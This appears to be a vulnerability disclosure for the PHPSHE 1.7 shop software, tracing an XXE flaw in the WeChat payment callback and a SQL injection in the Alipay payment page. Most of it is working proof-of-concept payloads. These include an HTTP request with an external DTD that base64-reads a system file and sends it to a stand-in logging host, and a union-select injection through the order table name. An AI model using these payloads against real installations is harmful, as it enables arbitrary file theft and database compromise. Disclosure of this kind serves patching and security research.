Fetch the repository succeeded.
The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, wechat_getxml function is called.
wechat_getxml function is defined in hook/wechat.hook.php ,then pe_getxmlfunction is called.
pe_getxml function is defined in include/function/global.func.php。simplexml_load_string() function is called to parse the xml from php://input. If the version of libxml lib < 2.9.0, simplexml_load_string() will parse the external entity in the default mod.
the poc is as below:
/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>
test.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;
We can use it to read any file in the system.
The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.
Then the renturn value of order_table will be directly spliced into SQL statements as table name.
So the poc is as below:
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_
